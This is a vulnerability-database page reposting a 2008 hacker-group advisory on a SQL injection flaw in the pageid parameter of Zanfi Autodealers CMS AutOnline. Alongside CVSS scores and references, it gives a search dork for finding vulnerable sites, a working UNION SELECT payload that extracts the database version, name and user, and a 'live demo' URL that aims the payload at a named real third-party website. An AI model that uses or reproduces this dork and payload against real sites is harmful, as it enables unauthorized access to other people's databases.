Autodealers CMS AutOnline (pageid) SQL Injection Vulnerability

2008.09.16
Credit: r45c4l
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # # ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE # # and all darkc0de members ---# ################################################################ # # Author: r45c4l # # Home : www.darkc0de.com # # Email : r45c4l@hotmail.com # # Share the c0de! # ################################################################ # # Title: Zanfi CMS lite / Autodealers CMS AutOnline (SQL Injection) # # Vendor: http://www.zanfi.nl/autodealerscms.php # # Demo: http://autonline.zanfi.nl/ ########################################################### # # d0rk:Powered by: Zanfi Solutions #. # ########################################################### Exploit:- http://www.site.com/[path]/index.php?page=DBpAGE&pageid=-1'+union+select+null,concat(version(),0x3a,database(),0x3a,user())/* Live Demo: http://www.aartsvastgoed.nl/aankoopvastgoed/index.php?page=DBpAGE&pageid=-1%27+union+select+null,concat(version(),0x3a,database(),0x3a,user())/* ########################################################### # # Bug discovered : 10 Sep.2008 ###########################################################

References:

http://xforce.iss.net/xforce/xfdb/45049
http://www.securityfocus.com/bid/31120
http://www.milw0rm.com/exploits/6426
http://www.frsirt.com/english/advisories/2008/2551


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023, cxsecurity.com

 

Back to Top